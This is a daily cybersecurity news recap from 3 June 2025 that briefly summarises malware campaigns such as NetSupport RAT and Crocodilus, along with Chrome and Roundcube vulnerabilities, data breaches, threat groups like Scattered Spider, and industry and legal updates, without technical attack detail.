Cybersecurity News | Daily Recap [03 Jun 2025]

Malware & RAT Campaigns

• A multi-stage PowerShell attack spreading NetSupport RAT uses fake DocuSign and Gitcode sites for delivery, leveraging social engineering to evade detection – NetSupport RAT Spread
• Victims are redirected to fake Booking.com pages hosting CAPTCHA prompts that lead to infections by Backdoor.AsyncRAT via clipboard hijacking and PowerShell commands – AsyncRAT Infection
• The Crocodilus Android Trojan, now active in 8 countries, uses fake contacts to spoof trusted callers and targets banks and crypto wallets with credential and seed phrase theft – Crocodilus Trojan, Crocodilus Fake Contacts
• The Acreed infostealer rises as a dominant threat after the Lumma takedown, focusing on credential theft from SaaS and SSO platforms across industries – Acreed Infostealer
• Attackers weaponize the free SSH client PuTTY on Windows to establish stealthy backdoors using trusted binaries and registry manipulation – PuTTY Malware

Vulnerabilities & Patch Releases

• A critical 10-year-old Roundcube webmail bug (CVE-2025-49113) allows authenticated users to execute arbitrary code, patched in versions 1.6.11 and 1.5.10 LTS – Roundcube Bug
• Google patches a critical actively exploited Chrome zero-day (CVE-2025-5419) in Chrome 137 affecting the V8 engine, preventing remote code execution – Chrome Zero-Day, Chrome Zero-Day Analysis, Chrome Emergency Patch
• Google’s June 2025 Android security update fixes over 30 high-severity vulnerabilities including unpatched zero-days exploited via Snapdragon and Qualcomm Adreno GPU drivers – Android Vulnerabilities, Qualcomm Zero-Days
• Two critical vulnerabilities in Consilium CS5000 Fire Panels allow remote system takeover via default accounts and embedded VNC credentials – CS5000 Fire Panel Flaws
• Preinstalled Android apps on Ulefone and Krüger&Matz phones have three critical flaws that enable device resets, PIN theft, and system-level privilege abuse – Phone App Flaws
• CISA warns of exploits targeting ConnectWise ScreenConnect vulnerability with active remote code execution attacks affecting ASUS routers and Craft CMS platforms – ScreenConnect Exploits
• Google Chrome will distrust certificates from Chunghwa Telecom and Netlock starting August 1, 2025, due to compliance and trust issues affecting TLS security – Chrome Distrust Certificates, Chrome Certificate Removal

Data Breaches & Cyberattacks

• MainStreet Bancshares suffered a data breach via a third-party vendor, exposing payment card data of about 4.65% of customers, though core systems remain secure – MainStreet Bank Breach, MainStreet Vendor Incident
• Cartier disclosed a data breach exposing customer names, emails, and countries but no financial information, amid ongoing cyber threats to luxury brands – Cartier Breach, Cartier Cyberattack
• The North Face reveals its fourth credential stuffing attack since 2020 exposed customer data including names and addresses, worsened by lack of MFA – North Face Attack
• Next Step Healthcare experienced a ransomware-related data breach leaking thousands of patient SSNs, medical records, and credit cards, claimed by Qilin gang – Next Step Healthcare Breach
• A large phishing campaign targeting French users exploits leaked personal data to scam over 160,000 victims with fake Amazon Prime renewal messages – Phishing in France

Threat Group Activity & Cybercrime

• Scattered Spider threat group targets UK retailers using complex identity-based techniques including help desk scams and MFA bypasses via social engineering – Scattered Spider Overview, Scattered Spider Help Desk Scams
• North Korean Lazarus Group increasingly targets the cryptocurrency sector and Web3 projects, with BitMEX infiltrating elements of their infrastructure revealing internal skill disparities – Lazarus vs BitMEX
• International law enforcement operations disrupted crypting sites that test malware against antivirus tools, impacting ransomware gangs such as Ryuk – Crypting Sites Takedown
• A cryptojacking campaign exploits exposed DevOps APIs including Docker, Gitea, and HashiCorp Nomad to mine Monero using publicly available tools and GitHub-based payloads – Cryptojacking Campaign, Monero Mining via DevOps

Industry & Cybersecurity Collaborations

• Microsoft and CrowdStrike have partnered to map and unify threat actor names like APT41 and APT28, improving clarity and collaboration in global cybersecurity intelligence – Threat Actor Mapping, Shared Threat Glossary, Microsoft-CrowdStrike Partnership
• Australia enforces new ransomware payment reporting regulations to enhance threat intelligence and cybersecurity defenses for affected businesses – Australia Ransomware Reporting
• Mozilla introduces an automated system to detect and block malicious Firefox crypto wallet add-ons, preventing wallet-draining attacks and safeguarding users – Mozilla Crypto Add-on Defense
• Microsoft tests a Quick Machine Recovery feature for Windows 11 aimed at enabling faster system repair and remote fixes, enhancing troubleshooting for users – Windows 11 Recovery

Legal & Business Updates

• The NSO Group appeals a $168 million damages award related to its Pegasus spyware, arguing the amount is excessive and designed to bankrupt the firm – NSO Pegasus Appeal
• SentinelOne’s recent seven-hour global outage was caused by a software flaw in their infrastructure control system, not a cyberattack, with endpoint security unaffected – SentinelOne Outage

Cybersecurity News | Daily Recap – hendryadrian.com

Views: 33